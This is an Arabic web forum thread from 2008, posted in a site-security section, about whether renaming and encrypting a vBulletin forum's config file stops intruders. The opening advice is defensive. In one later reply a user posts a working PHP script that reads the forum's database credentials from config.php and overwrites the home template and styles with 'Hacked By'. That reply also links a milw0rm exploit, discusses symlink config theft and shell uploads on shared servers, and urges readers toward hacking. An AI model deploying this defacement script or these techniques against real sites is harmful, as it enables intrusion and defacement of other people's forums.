ضع اعلانك هنا

 ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
العودة   عالم المعرفة > قسم الأنظمة والسيرفرات > الحماية من ثغرات المواقع و السرفرات
تحديث الصفحة الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
تفعيل العضوية استرجاع كلمة المرور شروط المنتــدى البحث مشاركات اليوم اجعل كافة الأقسام مقروءة
الحماية من ثغرات المواقع و السرفرات Security,حمايه,ترقيع ثغرات,تبليغ عن ثغره,دروس حماية الموقع, دروس عن حماية الجهاز
 

الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى

الحماية من ثغرات المواقع و السرفرات


إضافة رد
صفحة 1 من 2 1 2 >
 
LinkBack أدوات الموضوع
 
قديم 06-26-2008, 08:35 AM   #1 (permalink)
عضو مميز
 
الصورة الرمزية Qtr Linux







Qtr Linux غير متصل

Qtr Linux will become famous soon enoughQtr Linux will become famous soon enough

افتراضي الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته


,,, حطيت هذا الموضوع من الزهق

ههههه ,, نبدأ

واحد يقول ,,

نقدر نخترقه لو سحب روت و طرق الاختراق كثيرة وممكن DNS وووو
بقولك شي

لو حطيت موقعك بسيرفر قوي , ما راح يكون هناك اي شي باقي الا حمايتك انت


يعني اول شي

نقدر نغير مسار الكونفيق من تغيير 5 ملفات فقط داخل مجلد انكلودس
adminfunctions.php
class_core.php
functions.php
config.php
init.php

ونقدر نغير اسم الكونفيق الى اسم طويل
مثل
class_cost.php

لاني دايم اشوف عند الروافض يخلون اسم الكونفيق kon
و mas

وسهله تعينها

وتقدر تشفر 5 الملفات يلي فوق علشان ما يطلعها
اعني ما يطلع اسم الكونفيق

وتقدر بعد تغير اسم الانكلودس ,, والطريقة حطوها اخواننا في ترياق


النقطة يلي نسيتها

اقتباس:
امممم اخوننا , يلي فاهم يخترق المنتدى بيعرف كلامي
لان الهكر ما راح يقدر يسوي شي لو كانت الصلاحية يوزر وهو من بعيد
يعني
اختراق المنتدى بيكون
اما انه يعدل بالاستايل
او او يغير جدول spacer_open علشان يغير كل الصفحات ,, والحين اختصروها بسكربت
او انه يغير باس الادمن ويدخل
والاخير انه يكون معين التصريح 777 للمنتدى او للهاستكس او للاندكس ,, لو كانت نو بادي يعني
ولو ما قدر يعين الكونفيق او الملفات يلي تبين اسم الكونفيق
انسى انه يخترق المنتدى

وبكذا اكون انتهيت من الدرس

اعذرونا ما فيه صورة
لكن هذي تكفي

ههههه

وان شاء الله راح اسوي كم شرح اما فييديو او صور



اخوكم
قطر لينكس

التوقيع

الكبير طول عمره كبير
التعديل الأخير تم بواسطة Qtr Linux ; 06-26-2008 الساعة 08:40 AM. سبب آخر: نسيت نقطه مهمة
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-02-2008, 09:09 AM   #2 (permalink)
عضو جديد






EviL hEx غير متصل

EviL hEx will become famous soon enoughEviL hEx will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
مشكور أخوي
مبدع ماشاءالله عليك

التوقيع

أمحو ذنوبك في خلال دقيقتين
أخي الحبيب بالبدايه أتمنى أن تدعوا لي ولوالدي بكل ما هو خير
وان تدعوا لي بالتوفيق في دنيتي وآخرتي و في دراستي
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-02-2008, 12:03 PM   #3 (permalink)
pwp
عضو فعال
 
الصورة الرمزية pwp






pwp غير متصل

pwp will become famous soon enoughpwp will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
مشكووووووور على التوضيح
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-03-2008, 03:54 AM   #4 (permalink)
عضو جديد






الشمررري غير متصل

الشمررري will become famous soon enoughالشمررري will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
^_^

اذا سيرفر خاص ورفعت عليه شل وعليه منتدى اضمن 99% انه راح يخترق

سو غيرت اسم الكونفيج او ماغيرته راح يفتش بكل ملفات السيرفر لين يالقى الكونفيج

لكن نفرض انه سوى كلمة سر معقده تشمل رموز وحروف وارقام ونشفره ونتكل على الله اذا كان الهكر صبور ياعني عادي يصبر 10 ايام او شهر فراحت عليك ^_^

لاكن اعلم 70% من الحمايه على التصاريح

بالتوفيق
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-04-2008, 12:58 AM   #5 (permalink)
عضو مميز
 
الصورة الرمزية Qtr Linux







Qtr Linux غير متصل

Qtr Linux will become famous soon enoughQtr Linux will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
اقتباس:
المشاركة الأصلية كتبت بواسطة الشمررري
   ^_^

اذا سيرفر خاص ورفعت عليه شل وعليه منتدى اضمن 99% انه راح يخترق

سو غيرت اسم الكونفيج او ماغيرته راح يفتش بكل ملفات السيرفر لين يالقى الكونفيج

لكن نفرض انه سوى كلمة سر معقده تشمل رموز وحروف وارقام ونشفره ونتكل على الله اذا كان الهكر صبور ياعني عادي يصبر 10 ايام او شهر فراحت عليك ^_^

لاكن اعلم 70% من الحمايه على التصاريح

بالتوفيق

هههههههههه

اخوي ,, من دون الكونفيق
انسى شي اسمه اختراق

يعني غير اسم الانكلودس
و
الصلاحية يوزر هع هع
و
مشفر كل ملفات المنتدى بالزند 5
اوكي

تعال وخله يخترق
وهذا بعد

اقدر اخلي الهكر ينكع هنا

كيف !؟

لما تشفر اليوزر و الباس
بالـ md5 على الاقل

حيث ,, اليوزر دايم يجيب اسم اليورز حق الموقع
يعني
alm3refh_vb

لكن ,, تخيل ان اليوزر هو

alm3refh_mihahahahaahlooool192
هههههههههههه

والباس

efkbqwefe7w9ry43jhg56544

ونشفره بالـ md5 اعني اليوزر والباس

ما راح ينفعه بعدين


لانه بيقعد سنه وهو يحاول يفك الباس و اليوزر


وفيه 1000 طريقة و طريقة بعد

ومثل ما قلت أنت بعد

70% حمايه من التصريح

والتصريح الاقوى هو
111

لكن

تخيل لو قلت لك اني قدرت اسحب الكونفيق بالسايملنك --> " بيرل"
حق منتدى حمد الطيار

اوكي

واخونا " كنترول "
تعجب تعجب و انهذل لما سمع أن
اخونا حق الدعم الفني كان حاط المنتدى بالكامل 111



مدري كيف


يعني السايملنك البيرل تتخطى كل التصاريح


اتمنى وصلت لك الفكرة

التوقيع

الكبير طول عمره كبير
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-04-2008, 01:58 PM   #6 (permalink)
عضو جديد






الشمررري غير متصل

الشمررري will become famous soon enoughالشمررري will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
اقتباس:
تخيل لو قلت لك اني قدرت اسحب الكونفيق بالسايملنك --> " بيرل"
حق منتدى حمد الطيار

تخيل انه مغير مسار الكونفيج ^_^ شو راح بتعمل

اقتباس:
لما تشفر اليوزر و الباس
بالـ Md5 على الاقل

حيث ,, اليوزر دايم يجيب اسم اليورز حق الموقع
يعني
Alm3refh_vb

لكن ,, تخيل ان اليوزر هو

Alm3refh_mihahahahaahlooool192
هههههههههههه

والباس

Efkbqwefe7w9ry43jhg56544

ونشفره بالـ Md5 اعني اليوزر والباس

ما راح ينفعه بعدين


لانه بيقعد سنه وهو يحاول يفك الباس و اليوزر

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-04-2008, 02:28 PM   #7 (permalink)
عضو مميز
 
الصورة الرمزية Qtr Linux







Qtr Linux غير متصل

Qtr Linux will become famous soon enoughQtr Linux will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
اقتباس:
المشاركة الأصلية كتبت بواسطة الشمررري
   تخيل انه مغير مسار الكونفيج ^_^ شو راح بتعمل




لو كان مغير الكونفيق

عاادي ,, ومثل ما كتبت فوق

فيه 5 ملفات ,, لازم يغير كلمة كونفيق " config " الى اسم الجديد ويكون " kon "
او " bbb"

نقرأ مثلاَ
ملف
inti.php

ونشوفه بالكامل

وراح يظهر اسمه
ولو كان مشفر
فيه برنامج يفكه


عااادي

التوقيع

الكبير طول عمره كبير
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-22-2008, 02:13 PM   #8 (permalink)
عضو مميز






joker_1 غير متصل

joker_1 will become famous soon enoughjoker_1 will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
اقتباس:
المشاركة الأصلية كتبت بواسطة الشمررري
   ^_^

اذا سيرفر خاص ورفعت عليه شل وعليه منتدى اضمن 99% انه راح يخترق

كلام صحيح اخوي

واسمح لي اعدل في النسبة الي حطيتها انت 999%

منتديات الفي بي معر,فة بقوتها من ناحية الريمود اتاك
بس ضعيفة من ناحية الوكل اتاك

يعني عندك اكاونت بالسيرفر يبقي علي المنتدي السلام مهما كان مشفر او معدول او حتي نسخة فيبي خاصة وحصرية وصانعتها الشركة مخصوص لك - زي ما قال واحد كدا هههههه

يعني الحين هو معدل التصاريح السيمي لنك يعطيك فيربيدين

عندك دبشة حلول - دبشة يعني اكتر من 100

اول شي ممكن تحول صلاحيتك سواء من ال php او perl
وفي python بس محد يعرفها ههههههههههه

غير كدا الكل يستعمل السيمي لنك مع انة في ثغرات قرائة كتييرة

ومن حظ اصحاب المواقع انة ما يعرفها غير عدد بسيط من الهكر

ايضا مرات تكون السيمي لنك شغالة بس ما تقدر تسحب الملف


يبقي انتا عليك بس تسحبة بثغرة قرايتها اقوي -يعني قرايتة بطريقة غير المتصفح

مثل ايش يا جوكر

مثل هاي يخوي
http://www.milw0rm.com/exploits/3459

ممكن اعطيكم روابط لاستعمال السيمي لنك في الاختراقات بتاريخ 2004
بس الهكر العرب ما يعرفوها الا من كم شهر فات

الطرق كثير ومتشرة والشاطر الي يحصل اكبر كمية منها

وطبعا البرايفت مطلوب ليش ؟ لان النت مليان اطفال هكر



شي تاني مين قال اصلا انك محتاج تقرا الكونفيق عشان تخترق المنتدي ؟

في طريق ممكن تخترق بدون كونفيق

مثل ايش يا جوكر ؟

مثل دي
كود PHP:

<?php
include("/home/wxxxx/public_html/includes/config.php");

$variabls=get_defined_vars();

$pos=count($variabls)-1;

$keys array_keys($variabls);

$servername=$variabls[$keys[$pos]]['MasterServer']['servername'];
$username=$variabls[$keys[$pos]]['MasterServer']['username'];
$password=$variabls[$keys[$pos]]['MasterServer']['password'];
$database=$variabls[$keys[$pos]]['Database']['dbname'];

mysql_connect($servername,$username,$password);
mysql_select_db($database);

$tryag 'UPDATE `template` SET `template` = \'Hacked By \'WHERE `title` =\'FORUMHOME\';';
$tryag2'UPDATE `style` SET `css` = \'Hacked By \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
$result=mysql_query($tryag) or die(mysql_error());
$result=mysql_query($tryag2) or die(mysql_error());
?>
بس عدل المسار

بس طبعا في حماية تمنعها

بس عليك تتخطي الحماية
او تستعمل دالة ثانية غير الي بالاسكربت


وفي كمان سكربتات تجيبلك يوزر وباس السيكل لليوزر الي تبي تخترقة

غير انك ممكن تجيب كل يوزرات وباسوردات القواعد من اقرب ثغرة سيكل انجكشن بالسيرفر
اذا ما لقيت ثغرة تقدر تسوي ثغرة لوحدك


ياريت الشباب تبعث وتفتش المواقع وصدقني تعرف امتي بتكون هكر ممتاز ؟

لما تيجي تفتح القوقل ويقولك
" ياخي كرهتني انت كل يوم تبحث فيني انا تعبت منك "

تحياتي

اخوكم
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 07-22-2008, 02:57 PM   #9 (permalink)
عضو مميز
 
الصورة الرمزية Qtr Linux







Qtr Linux غير متصل

Qtr Linux will become famous soon enoughQtr Linux will become famous soon enough

افتراضي رد: الملف الاساسي للمنتدى ,, من دونه اتحدى الهكر يخترق المنتدى
ههههههههههههههه

يعطيك العافية وصحيح

يعني يلي يكون من سنة 2006 وفوق
يمكن ما يكون له خبره كبيرة

والله انا متفائل في اخونا صلاح ما شاء الله عليه


امممم

,, ممكن استفسار
انت تقول السكربت وتحطه

انا ما تعلمت php لكن
من السكربت مبين انه لازم تكون عندك معلومات القاعدة و اليوزر والباس


$servername=$variabls[$keys[$pos]]['MasterServer']['servername'];
$username=$variabls[$keys[$pos]]['MasterServer']['username'];
$password=$variabls[$keys[$pos]]['MasterServer']['password'];
$database=$variabls[$keys[$pos]]['Database']['dbname'];

انا اقول لو الحين الكونفيق مشفر على طريقتي

تعال بعدها واخترقني


امممم ,, لو انت بكرة موجود
بسوي منتدى , وبعطيك شل عليه وتصريح وكل شي تبيه
المهم ,, غير الاندكس


تحياتي

التوقيع

الكبير طول عمره كبير
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!